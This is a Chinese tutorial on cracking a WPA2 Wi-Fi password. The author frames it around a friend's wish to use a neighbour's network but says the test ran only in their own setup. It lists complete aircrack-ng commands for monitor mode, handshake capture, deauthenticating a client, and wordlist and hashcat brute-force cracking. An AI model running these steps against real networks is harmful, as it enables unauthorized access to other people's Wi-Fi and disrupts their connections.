废话
一个朋友临时来岛成出差,由于持续时间比较成,因此住在了自己家里。由于长时间在外面,因此家里没有网。
于是他跟我商量是否能够在附近找一个邻居的WIFI临时“借(po)用(jie)一(yi)下(ge)”,这种事情虽然作为一个安全从业人员这么做有点不地道。但由于自己从来没接触过这方面知识,因此自己搭一个环境测试了一下。 废话少说一下简述过程。
简述
本次测试过程中涉及到工具如下:
airmon-ng:这个工具比较常见工具详细介绍。主要功能有网络侦测,数据包嗅探等功能。
airodump-ng:此工具主要用于用户抓取握手包
aireplay-ng:主要用户强制现有网络设备重发握手包。
aircrack-ng:用于破解握手包
其他辅助工具:hashcat
开始测试
- 断开wifi网络链接,确认使用的网络接口
sudo airmon-ng
如果在运行此命令后为发现interface,则说明现有无线网卡不支持监听模式,需要购买支持监听模式的网卡如RTL8187等。
- 开启监听模式
sudo airmon-ng start wlan0
执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。
- 查看网络状态
airodump-ng wlan0mon
- 开始抓包
airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
- -c指定频道id
- --bssid 指定路由器bssid
- -w 保存数据包位置
由于路由器只是在重新链接是才会发送握手包,因此需要将以连接设备重新连接。
- 强制踢出设备
通过aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
sudo aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
- -0表示发起deauthentication攻击
- -a指定无线路由器BSSID
- -c指定强制断开的设备
抓包成功后ctrl+C即可结束抓包。
停止监听模式
airmon-ng stop wlan0mon
- 开始跑包
aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
- -a2代表WPA的握手包
- -b指定要破解的wifi BSSID。
- -w指定字典文件
- 最后是抓取的包
跑密码时可以通过GPU的运算力破解各种不同算法的hash值,可以通过下载hascat进行破解。
在破解前需要将cap文件转换为.hccap。
转换方法如下:
aircrack-ng file.cap -J out.hccap
在转换时如果报错,可能会是未抓到握手包,通过错误提示可知到。
- hashcat跑包
hashcat64.exe -m 2500 -a3 A8_handshake.cap.hccap ?d?d?d?d?d?d?d?dpause
- -m 2500:破解 WPA2 密码
- -a3:暴力破解
- A8_handshake.cap.hccap:握手包文件
文档中部分内容参考网络其他资料,文中涩及到的内容仅在测试环境中使用,请勿进行网络攻击。